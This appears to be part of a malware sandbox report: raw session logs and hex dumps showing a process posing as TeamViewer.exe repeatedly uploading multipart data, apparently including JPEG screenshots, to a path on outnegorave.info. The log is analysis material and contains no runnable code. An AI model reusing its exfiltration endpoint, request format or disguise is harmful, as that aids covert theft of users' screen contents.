                                                                                                                                    2021-09-15 11:52:41 UTC2751OUTData Raw: a6 20 34 a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69 a2 96 99 23 b3 4a 29 b4 a2 9a 13 1c 29 69 b4 e1 4c 96 14 b4 94 53 10 b4 52 52 d0 01 4b 49 4b 40 0b 4b 4d a7 50 26 14 a2 92 96 81 0b 45 25 2d 02 0a 5a 28 a6 01 4a 28 a5 14 09 8b 40 a4 a5 14 08 d0 d2 47 ef dc fa 21 aa c7 a9 fa d5 ad 27 fd 74 9f ee 9a aa 7a 9f ad 64 be 36 13 f8 50 51 45 15 a1 90
                                                                                                                                    Data Ascii: 4PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci#J))iLSRRKIK@KMP&E%-Z(J(@G!'tzd6PQE
                                                                                                                                    2021-09-15 11:52:41 UTC2767OUTData Raw: 64 82 8a 40 68 aa 44 8b 4b 49 46 69 85 85 cd 19 a4 14 b4 5c 56 14 52 e6 99 4b 9a 77 0b 0f cd 2d 33 34 b9 a6 4d 87 0a 5c d3 73 45 3b 85 87 e6 8c d3 73 46 ef 6a 2e 2b 12 03 4b 9a 8f 71 f5 a3 3e f4 ee 2b 12 64 51 9a 8f 34 b9 a2 e2 b0 fc d1 9a 6e 68 cd 3b 85 87 52 e6 9b 46 68 b8 ac 3b 34 b9 a6 66 8c d3 b8 58 7e 68 cd 33 75 26 ea 2e 1c a4 99 a3 35 1e ea 37 52 b8 72 92 6e a4 dd 51 17 a6 97 a1 c8 6a 04 c5 a9 a5 ea 22 f4 d2 d5 2e 65 28 12 97 a6 17 a8 cb 53 0b 54 39 16 a0 48 5f de 98 5a 98 5a 98 5a a1 c8 d1 44 79 6a 61 6a 69 6a 61 6a cd c8 d1 44 71 34 c2 69 09 a4 a8 6c b4 85 26 92 92 8c d2 63 b0 86 8a 0d 36 a4 a4 19 a2 92 92 95 c7 62 86 3b d2 d2 51 5c a7 58 b4 51 46 28 00 a2 8a 28 10 b4 51 49 40 05 14 51 40 05 2d 25 2d 00 14 51 45 02 0a 28 a2 98 05 14 51 40 05 2d
                                                                                                                                    Data Ascii: d@hDKIFi\VRKw-34M\sE;sFj.+Kq>+dQ4nh;RFh;4fX~h3u&.57RrnQj".e(ST9H_ZZZDyjajijajDq4il&c6b;Q\XQF((QI@Q@-%-QE(Q@-
                                                                                                                                    2021-09-15 11:52:41 UTC2783OUTData Raw: f0 e3 51 b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc 25 17 be 56 31 b9 73 8f 5d a3 3f ad 62 d6 d4 e5 cf 05 2e e8 e2 92 b3 68 28 a2 96
                                                                                                                                    Data Ascii: Q61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_%V1s]?b.h(
                                                                                                                                    2021-09-15 11:52:41 UTC2786OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 36 30 32 38 38 37 33 36 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2060288736--
                                                                                                                                    2021-09-15 11:52:42 UTC2786INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:42 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=3555c1bb573aa00d8de055a57f8aebf6e68de051c68d0b72a030dd46b103fd1e; expires=Thu, 15-Sep-2022 11:52:41 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y6oXd5mFq2wH%2FLhJXQI3AOVtdGQ%2FiB%2Fc1S6k7O0D353cNCwtqLF71nnI7bxTikcFdCfUTTnTEh1GXMYNCsM9%2BUbUBhvyt5mNS9JZO2mUsshjK7u0AviuSShEcR6ZCGUktBLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a67dbf0c2c22-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:42 UTC2787INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    33192.168.2.549824172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:42 UTC2787OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85018
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1941005641
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:42 UTC2787OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 39 34 31 30 30 35 36 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1941005641Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:42 UTC2787OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 91 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:42 UTC2787OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:42 UTC2803OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:42 UTC2819OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:42 UTC2835OUTData Raw: 05 25 19 a6 21 d4 52 52 d3 00 a2 8a 5a 04 14 b4 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d 24 7e fd cf a2 1a ac 7a 9f ad
                                                                                                                                    Data Ascii: %!RRZQbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@$~z
                                                                                                                                    2021-09-15 11:52:42 UTC2851OUTData Raw: 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26 3b 08 68 a0 d3 6a 4a 41 9a 29
                                                                                                                                    Data Ascii: -1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&;hjJA)
                                                                                                                                    2021-09-15 11:52:42 UTC2867OUTData Raw: b8 ca 31 45 4f a6 39 27 eb f9 57 3d af fc 35 d4 2c f7 4d a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7 4f 16 9a 27 82 67 8a 55 2a e8 4a b0
                                                                                                                                    Data Ascii: 1EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O'gU*J
                                                                                                                                    2021-09-15 11:52:42 UTC2870OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 39 34 31 30 30 35 36 34 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1941005641--
                                                                                                                                    2021-09-15 11:52:43 UTC2870INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:43 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=6a59ae9338336a9533804596d61787d94bc0dc9f7b67c05803c82a6a485b3ebe; expires=Thu, 15-Sep-2022 11:52:42 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tmJ4rOI3cXLzEu8zxMC7AO7ojxjB3vB7dCNBSk4tM1YT6uupyqBftZIPzVnet5jn2%2FZT6Sc32yxidsd7fPPsG2Qi6tvVvkGca8cmzhC%2F%2BMB265Ylk2%2FI6B%2BhBITAjPEt7ESo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6838b6e145a-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:43 UTC2871INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    34192.168.2.549825172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:43 UTC2871OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84997
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------168896387
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:43 UTC2871OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 36 38 38 39 36 33 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------168896387Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:43 UTC2872OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 64 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^d;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:43 UTC2872OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:43 UTC2888OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:43 UTC2904OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:43 UTC2920OUTData Raw: 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d 24 7e fd cf a2 1a ac 7a 9f ad 5a d2 7f d7 49 fe e9 aa a7 a9 fa d6 4b e3 61 3f 85 05 14
                                                                                                                                    Data Ascii: bJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@$~zZIKa?
